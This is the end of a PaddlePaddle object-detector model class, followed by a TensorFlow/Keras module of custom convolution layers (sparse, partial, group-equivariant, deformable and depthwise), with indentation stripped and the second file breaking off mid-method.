im_flip = feed_vars[im_name_flip]
img = fluid.layers.concat([img, im_flip], axis=0)
body_feats = self.extract_feat(img)
bboxes, scores, clses = self.head.get_prediction(
body_feats[-1], use_flip=self.use_flip)
bboxes = rescale_bboxes(bboxes, ratios, borders)
bboxes = bboxes / scale
detection = fluid.layers.concat([clses, scores, bboxes], axis=2)
det_name = 'bbox_scale_{}'.format(scale)
results[det_name] = detection[0]
return results
def _input_check(self, require_fields, feed_vars):
for var in require_fields:
assert var in feed_vars, \
"{} has no {} field".format(feed_vars, var)
def _inputs_def(self, image_shape, output_size, max_tag_len):
"""output_size: (w, h)"""
im_shape = [None] + image_shape
C = self.num_classes
# yapf: disable
inputs_def = {
'image': {'shape': im_shape, 'dtype': 'float32', 'lod_level': 0},
'im_id': {'shape': [None, 1], 'dtype': 'int64', 'lod_level': 0},
'gt_bbox': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 1},
'gt_class': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 1},
'ratios': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
'borders': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 0},
'sizes': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
'heatmaps': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'regrs': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
'reg_mask': {'shape': [None, max_tag_len], 'dtype': 'float32', 'lod_level': 0},
'ind': {'shape': [None, max_tag_len], 'dtype': 'int64', 'lod_level': 0},
'wh': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
'tlbr': {'shape': [None, 2, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'tlbr_mask': {'shape': [None, 1, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'heat_weight': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
'is_difficult': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 0},
}
# yapf: enable
return inputs_def
def build_inputs(
self,
image_shape=[3, None, None],
fields=[
'image', 'im_id', 'gt_box', 'gt_class', 'heatmaps',
'regrs', 'reg_mask', 'ind', 'wh',
], # for train
multi_scale=False,
test_scales=[1.0],
use_flip=None,
output_size=[128, 128],
max_tag_len=128,
use_dataloader=True,
iterable=False):
inputs_def = self._inputs_def(image_shape, output_size, max_tag_len)
fields = copy.deepcopy(fields)
if multi_scale:
ms_def, ms_fields = corner_multiscale_def(image_shape, test_scales, use_flip)
inputs_def.update(ms_def)
fields += ms_fields
self.use_flip = use_flip
self.test_scales = test_scales
feed_vars = OrderedDict([(key, fluid.data(
name=key,
shape=inputs_def[key]['shape'],
dtype=inputs_def[key]['dtype'],
lod_level=inputs_def[key]['lod_level'])) for key in fields])
loader = fluid.io.DataLoader.from_generator(
feed_list=list(feed_vars.values()),
capacity=64,
use_double_buffer=True,
iterable=iterable) if use_dataloader else None
return feed_vars, loader
def train(self, feed_vars):
return self.build(feed_vars, mode='train')
def eval(self, feed_vars, multi_scale=None):
if multi_scale:
return self.build_multi_scale(feed_vars)
return self.build(feed_vars, mode='test')
def test(self, feed_vars):
return self.build(feed_vars, mode='test')
| 8,038 | 2,659 |
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.layers import Layer, Lambda
from tensorflow.python.keras.layers import InputSpec
from tensorflow.python.ops import nn_ops
from tensorflow.python.keras import initializers, regularizers, constraints, activations
from tensorflow.python.keras.utils import conv_utils
def gaussian_init(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
return K.constant(v, dtype=dtype)
def conv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def conv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
def conv_init_relu2(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2
return K.constant(v, dtype=dtype)
def depthwiseconv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def depthwiseconv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
class Conv2DBaseLayer(Layer):
"""Basic Conv2D class from which other layers inherit.
"""
def __init__(self,
kernel_size,
strides=(1, 1),
padding='valid',
#data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=False,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
bias_initializer='zeros',
bias_regularizer=None,
bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv2DBaseLayer, self).__init__(
activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
self.rank = rank = 2
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_initializer = initializers.get(bias_initializer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.bias_constraint = constraints.get(bias_constraint)
def get_config(self):
config = super(Conv2DBaseLayer, self).get_config()
config.update({
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_initializer': initializers.serialize(self.bias_initializer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'bias_constraint': constraints.serialize(self.bias_constraint),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
})
return config
class Conv2D(Conv2DBaseLayer):
"""Conv2D Layer with Weight Normalization.
# Arguments
They are the same as for the normal Conv2D layer.
weightnorm: Boolean flag, whether Weight Normalization is used or not.
# References
[Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks](http://arxiv.org/abs/1602.07868)
"""
def __init__(self, filters, kernel_size, weightnorm=False, eps=1e-6, **kwargs):
super(Conv2D, self).__init__(kernel_size, **kwargs)
self.filters = filters
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(Conv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
features = K.conv2d(features, kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(Conv2D, self).get_config()
config.update({
'filters': self.filters,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class SparseConv2D(Conv2DBaseLayer):
"""2D Sparse Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, 1)
If no mask is provided, all input pixels with features unequal
to zero are considered as valid.
# Example
x, m = SparseConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
x, m = SparseConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
Sparse Convolution propagates the sparsity of the input data
through the network using a 2D mask.
# References
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
**kwargs):
super(SparseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, 1, 1)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(SparseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(tf.reduce_sum(features, axis=-1, keepdims=True), 0), 0.0, 1.0)
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, self.kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, self.mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
#ratio = tf.where(tf.equal(norm,0), 0.0, 1/norm) # Note: The authors use this in the paper, but it would require special initialization...
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [*feature_shape[:-1], 1]
return [feature_shape, mask_shape]
def get_config(self):
config = super(SparseConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
})
return config
class PartialConv2D(Conv2DBaseLayer):
"""2D Partial Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, channels)
If the shape is (batch_size, rows, cols, 1), the mask is repeated
for each channel. If no mask is provided, all input elements
unequal to zero are considered as valid.
# Example
x, m = PartialConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
x, m = PartialConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
In contrast to Sparse Convolution, Partial Convolution propagates
the sparsity for each channel separately. This makes it possible
to concatenate the features and the masks from different branches
in architecture.
# References
[Image Inpainting for Irregular Holes Using Partial Convolutions](https://arxiv.org/abs/1804.07723)
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
weightnorm=False,
eps=1e-6,
**kwargs):
super(PartialConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
mask_shape = input_shape[1]
self.mask_shape = mask_shape
else:
feature_shape = input_shape
self.mask_shape = feature_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(PartialConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
# if mask has only one channel, repeat
if self.mask_shape[-1] == 1:
mask = tf.repeat(mask, tf.shape(features)[-1], axis=-1)
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(features, 0), 0.0, 1.0)
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
mask_kernel = self.mask_kernel
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [feature_shape[0], *new_space, self.filters]
return [feature_shape, mask_shape]
def get_config(self):
config = super(PartialConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class GroupConv2D(Conv2DBaseLayer):
"""2D Group Convolution layer that shares weights over symmetries.
Group Convolution provides discrete rotation equivariance. It reduces the number
of parameters and typically lead to better results.
The following two finite groups are supported:
Cyclic Group C4 (p4, 4 rotational symmetries)
Dihedral Group D4 (p4m, 4 rotational and 4 reflection symmetries)
# Arguments
They are the same as for the normal Conv2D layer.
filters: int, The effective number of filters is this value multiplied by the
number of transformations in the group (4 for C4 and 8 for D4)
kernel_size: int, Only odd values are supported
group: 'C4' or 'D4', Stay with one group when stacking layers
# Input shape
featurs: 4D tensor with shape (batch_size, rows, cols, in_channels)
or 5D tensor with shape (batch_size, rows, cols, num_transformations, in_channels)
# Output shape
featurs: 5D tensor with shape (batch_size, rows, cols, num_transformations, out_channels)
# Notes
- BatchNormalization works as expected and shares the statistict over symmetries.
- Spatial Pooling can be done via AvgPool3D.
- Pooling along the group dimension can be done via MaxPool3D.
- Concatenation along the group dimension can be done via Reshape.
- To get a model with the inference time of a normal CNN, you can load the
expanded kernel into a normal Conv2D layer. The kernel expansion is
done in the 'call' method and the expanded kernel is stored in the
'transformed_kernel' attribute.
# Example
x = Input((16,16,3))
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = BatchNormalization()(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = AvgPool3D(pool_size=(2,2,1), strides=(2,2,1), padding='same')(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = MaxPool3D(pool_size=(1,1,x.shape[-2]))(x)
s = x.shape
x = Reshape((s[1],s[2],s[3]*s[4]))(x)
# References
[Group Equivariant Convolutional Networks](https://arxiv.org/abs/1602.07576)
[Rotation Equivariant CNNs for Digital Pathology](https://arxiv.org/abs/1806.03962)
https://github.com/tscohen/GrouPy
https://github.com/basveeling/keras-gcnn
"""
def __init__(self, filters, kernel_size, group='D4', **kwargs):
super(GroupConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if self.kernel_size[0] % 2 != 1:
raise ValueError('Requires odd kernel size')
group = group.upper()
if group == 'C4':
self.num_transformations = 4
elif group == 'D4':
self.num_transformations = 8
else:
raise ValueError('Unknown group')
self.filters = filters
self.group = group
self.input_spec = InputSpec(min_ndim=4, max_ndim=5)
def compute_output_shape(self, input_shape):
space = input_shape[1:3]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], *new_space, self.num_transformations, self.filters)
def build(self, input_shape):
if len(input_shape) == 4:
self.first = True
num_in_channels = input_shape[-1]
else:
self.first = False
num_in_channels = input_shape[-2] * input_shape[-1]
self.kernel = self.add_weight(name='kernel',
shape=(*self.kernel_size, num_in_channels, self.filters),
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def call(self, features):
ni = features.shape[-1]
no = self.filters
if self.group == 'C4':
nt = 4
elif self.group == 'D4':
nt = 8
nti = 1 if self.first else nt
nto = nt
k = self.kernel_size[0]
t = np.reshape(np.arange(nti*k*k), (nti,k,k))
trafos = [np.rot90(t,k,axes=(1, 2)) for k in range(4)]
if nt == 8:
trafos = trafos + [np.flip(t,1) for t in trafos]
self.trafos = trafos = np.array(trafos)
# index magic happens here
if nti == 1:
indices = trafos
elif nti == 4:
indices = [[trafos[l, (m-l)%4 ,:,:] for m in range(4)] for l in range(4)]
elif nti == 8:
indices = [[trafos[l, (m-l)%4 if ((m < 4) == (l < 4)) else (m+l)%4+4 ,:,:] for m in range(8)] for l in range(8)]
self.indices = indices = np.reshape(indices, (nto,nti,k,k))
# transform the kernel
kernel = self.kernel
kernel = tf.reshape(kernel, (nti*k*k, ni, no))
kernel = tf.gather(kernel, indices, axis=0)
kernel = tf.reshape(kernel, (nto, nti, k,k, ni, no))
kernel = tf.transpose(kernel, (2,3,1,4,0,5))
kernel = tf.reshape(kernel, (k,k, nti*ni, nto*no))
self.transformed_kernel = kernel
if self.first:
x = features
else:
s = features.shape
x = tf.reshape(features, (-1,s[1],s[2],s[3]*s[4]))
x = K.conv2d(x, kernel, strides=self.strides, padding=self.padding, dilation_rate=self.dilation_rate)
s = x.shape
x = tf.reshape(x, (-1,s[1],s[2],nto,no))
features = x
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(GroupConv2D, self).get_config()
config.update({
'filters': self.filters,
'group': self.group,
})
return config
class DeformableConv2D(Conv2DBaseLayer):
"""2D Deformable Convolution layer that learns the spatial offsets where
the input elements of the convolution are sampled.
The layer is basically a updated version of An Jiaoyang's code.
# Notes
- A layer does not use a native CUDA kernel which would have better
performance https://github.com/tensorflow/addons/issues/179
# References
[Deformable Convolutional Networks](https://arxiv.org/abs/1703.06211)
# related code
https://github.com/DHZS/tf-deformable-conv-layer (An Jiaoyang, 2018-10-11)
"""
def __init__(self, filters, kernel_size, num_deformable_group=None, **kwargs):
"""`kernel_size`, `strides` and `dilation_rate` must have the same value in both axis.
:param num_deformable_group: split output channels into groups, offset shared in each group. If
this parameter is None, then set num_deformable_group=filters.
"""
super(DeformableConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if not self.strides[0] == self.strides[1]:
raise ValueError('Requires equal stride')
if not self.dilation_rate[0] == self.dilation_rate[1]:
raise ValueError('Requires equal dilation')
self.filters = filters
if num_deformable_group is None:
num_deformable_group = filters
if filters % num_deformable_group != 0:
raise ValueError('"filters" mod "num_deformable_group" must be zero')
self.num_deformable_group = num_deformable_group
self.kernel = None
self.bias = None
self.offset_layer_kernel = None
self.offset_layer_bias = None
def build(self, input_shape):
input_dim = input_shape[-1]
# kernel_shape = self.kernel_size + (input_dim, self.filters)
# we want to use depth-wise conv
kernel_shape = self.kernel_size + (self.filters * input_dim, 1)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
# create offset conv layer
offset_num = self.kernel_size[0] * self.kernel_size[1] * self.num_deformable_group
self.offset_layer_kernel = self.add_weight(name='offset_layer_kernel',
shape=self.kernel_size + (input_dim, offset_num * 2), # 2 means x and y axis
initializer=tf.zeros_initializer(),
regularizer=self.kernel_regularizer,
trainable=True,
dtype=self.dtype)
self.offset_layer_bias = self.add_weight(name='offset_layer_bias',
shape=(offset_num * 2,),
initializer=tf.zeros_initializer(),
# initializer=tf.random_uniform_initializer(-5, 5),
regularizer=self.bias_regularizer,
trainable=True,
dtype=self.dtype)
self.built = True
def call(self, inputs, training=None, **kwargs):
# get offset, shape [batch_size, out_h, out_w, filter_h, * filter_w * channel_out * 2]
offset = tf.nn.conv2d(inputs,
filters=self.offset_layer_kernel,
strides=[1, *self.strides, 1],
padding=self.padding.upper(),
dilations=[1, *self.dilation_rate, 1])
offset += self.offset_layer_bias
# add padding if needed
inputs = self._pad_input(inputs)
# some length
batch_size = tf.shape(inputs)[0]
channel_in = int(inputs.shape[-1])
in_h, in_w = [int(i) for i in inputs.shape[1: 3]] # input feature map size
out_h, out_w = [int(i) for i in offset.shape[1: 3]] # output feature map size
filter_h, filter_w = self.kernel_size
# get x, y axis offset
offset = tf.reshape(offset, [batch_size, out_h, out_w, -1, 2])
y_off, x_off = offset[:, :, :, :, 0], offset[:, :, :, :, 1]
# input feature map gird coordinates
y, x = self._get_conv_indices([in_h, in_w])
y, x = [tf.expand_dims(i, axis=-1) for i in [y, x]]
y, x = [tf.tile(i, [batch_size, 1, 1, 1, self.num_deformable_group]) for i in [y, x]]
y, x = [tf.reshape(i, [batch_size, *i.shape[1: 3], -1]) for i in [y, x]]
y, x = [tf.cast(i, 'float32') for i in [y, x]]
# add offset
y, x = y + y_off, x + x_off
y = tf.clip_by_value(y, 0, in_h - 1)
x = tf.clip_by_value(x, 0, in_w - 1)
# get four coordinates of points around (x, y)
y0, x0 = [tf.cast(tf.floor(i), 'int32') for i in [y, x]]
y1, x1 = y0 + 1, x0 + 1
# clip
y0, y1 = [tf.clip_by_value(i, 0, in_h - 1) for i in [y0, y1]]
x0, x1 = [tf.clip_by_value(i, 0, in_w - 1) for i in [x0, x1]]
# get pixel values
indices = [[y0, x0], [y0, x1], [y1, x0], [y1, x1]]
p0, p1, p2, p3 = [DeformableConv2D._get_pixel_values_at_point(inputs, i) for i in indices]
# cast to float
x0, x1, y0, y1 = [tf.cast(i, 'float32') for i in [x0, x1, y0, y1]]
# weights
w0 = (y1 - y) * (x1 - x)
w1 = (y1 - y) * (x - x0)
w2 = (y - y0) * (x1 - x)
w3 = (y - y0) * (x - x0)
# expand dim for broadcast
w0, w1, w2, w3 = [tf.expand_dims(i, axis=-1) for i in [w0, w1, w2, w3]]
# bilinear interpolation
pixels = tf.add_n([w0 * p0, w1 * p1, w2 * p2, w3 * p3])
# reshape the "big" feature map
pixels = tf.reshape(pixels, [batch_size, out_h, out_w, filter_h, filter_w, self.num_deformable_group, channel_in])
pixels = tf.transpose(pixels, [0, 1, 3, 2, 4, 5, 6])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, self.num_deformable_group, channel_in])
# copy channels to same group
feat_in_group = self.filters // self.num_deformable_group
pixels = tf.tile(pixels, [1, 1, 1, 1, feat_in_group])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, -1])
# depth-wise conv
out = tf.nn.depthwise_conv2d(pixels, self.kernel, [1, filter_h, filter_w, 1], 'VALID')
# add the output feature maps in the same group
out = tf.reshape(out, [batch_size, out_h, out_w, self.filters, channel_in])
out = tf.reduce_sum(out, axis=-1)
if self.use_bias:
out += self.bias
return self.activation(out)
def _pad_input(self, inputs):
"""Check if input feature map needs padding, because we don't use the standard Conv() function.
:param inputs:
:return: padded input feature map
"""
# When padding is 'same', we should pad the feature map.
# if padding == 'same', output size should be `ceil(input / stride)`
if self.padding == 'same':
in_shape = inputs.shape.as_list()[1:3]
padding_list = []
for i in range(2):
filter_size = self.kernel_size[i]
dilation = self.dilation_rate[i]
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
same_output = (in_shape[i] + self.strides[i] - 1) // self.strides[i]
valid_output = (in_shape[i] - dilated_filter_size + self.strides[i]) // self.strides[i]
if same_output == valid_output:
padding_list += [0, 0]
else:
p = dilated_filter_size - 1
p_0 = p // 2
padding_list += [p_0, p - p_0]
if sum(padding_list) != 0:
padding = [[0, 0],
[padding_list[0], padding_list[1]], # top, bottom padding
[padding_list[2], padding_list[3]], # left, right padding
[0, 0]]
inputs = tf.pad(inputs, padding)
return inputs
def _get_conv_indices(self, feature_map_size):
"""the x, y coordinates in the window when a filter sliding on the feature map
:param feature_map_size:
:return: y, x with shape [1, out_h, out_w, filter_h * filter_w]
"""
feat_h, feat_w = [int(i) for i in feature_map_size[0: 2]]
x, y = tf.meshgrid(tf.range(feat_w), tf.range(feat_h))
x, y = [tf.reshape(i, [1, *i.get_shape(), 1]) for i in [x, y]] # shape [1, h, w, 1]
x, y = [tf.image.extract_patches(i,
[1, *self.kernel_size, 1],
[1, *self.strides, 1],
[1, *self.dilation_rate, 1],
'VALID')
for i in [x, y]] # shape [1, out_h, out_w, filter_h * filter_w]
return y, x
@staticmethod
def _get_pixel_values_at_point(inputs, indices):
"""get pixel values
:param inputs:
:param indices: shape [batch_size, H, W, I], I = filter_h * filter_w * channel_out
:return:
"""
y, x = indices
batch, h, w, n = y.shape.as_list()[0: 4]
y_shape = tf.shape(y)
batch, n = y_shape[0], y_shape[3]
batch_idx = tf.reshape(tf.range(0, batch), (batch, 1, 1, 1))
b = tf.tile(batch_idx, (1, h, w, n))
pixel_idx = tf.stack([b, y, x], axis=-1)
return tf.gather_nd(inputs, pixel_idx)
class DepthwiseConv2D(Conv2DBaseLayer):
"""2D depthwise convolution layer.
# Notes
A DepthwiseConv2D layer followed by an 1x1 Conv2D layer is equivalent
to the SeparableConv2D layer provided by Keras.
# References
[Xception: Deep Learning with Depthwise Separable Convolutions](http://arxiv.org/abs/1610.02357)
"""
def __init__(self, depth_multiplier, kernel_size,
kernel_initializer=depthwiseconv_init_relu,
**kwargs):
super(DepthwiseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.depth_multiplier = depth_multiplier
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
kernel_shape = (*self.kernel_size, feature_shape[-1], self.depth_multiplier)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(feature_shape[-1]*self.depth_multiplier,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(DepthwiseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
features = K.depthwise_conv2d(features, self.kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
